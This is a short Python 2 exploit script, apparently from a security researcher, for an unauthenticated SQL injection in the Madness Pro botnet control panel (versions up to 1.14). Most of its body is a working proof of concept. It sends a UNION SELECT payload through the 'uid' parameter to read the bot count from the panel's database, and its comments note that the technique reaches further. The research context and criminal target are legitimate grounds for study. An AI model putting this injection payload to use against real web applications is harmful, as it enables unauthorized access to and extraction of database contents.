37 lines
No EOL
2.4 KiB
Python
Executable file
37 lines
No EOL
2.4 KiB
Python
Executable file
#!/usr/bin/env python2
|
|
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Madness Pro <= 1.14 SQL injection
|
|
# Date: June 05, 2014
|
|
# Exploit Author: @botnet_hunter
|
|
# Version: 1.14
|
|
# Tested on: Apache2 - Ubuntu - MySQL
|
|
# ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌
|
|
# ██• ▪ ▐█ ▀█▪▪ •██ ▪ ·██ ▐███▪▐█▪██▌
|
|
# ██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪
|
|
# ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.
|
|
# .▀▀▀ ▀█▄▀▪·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ •
|
|
# ▄▄· ▄• ▄▌▄▄▄ ▪ ▐ ▄ ▄▄ • • ▌ ▄ ·. ▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·
|
|
# ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪ ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.
|
|
# ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
|
|
# ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█ ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
|
|
# ·▀▀▀ ▀▀▀ .▀ ▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀ ▀▀▀▀ ▀▀▀▀
|
|
#
|
|
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
|
|
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
|
|
# Discovered and developed by bwall @botnet_hunter
|
|
#
|
|
# References:
|
|
# http://blog.cylance.com/a-study-in-bots-lobotomy
|
|
#
|
|
import urllib
|
|
|
|
# Fill in URL that Madness Pro bot connects back to
|
|
panel_url = ""
|
|
|
|
|
|
def run_sqli_proof_of_concept(panel_index_url):
|
|
f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
|
|
"%20--%20--".format(panel_index_url))
|
|
print f.read()
|
|
|
|
run_sqli_proof_of_concept(panel_url) |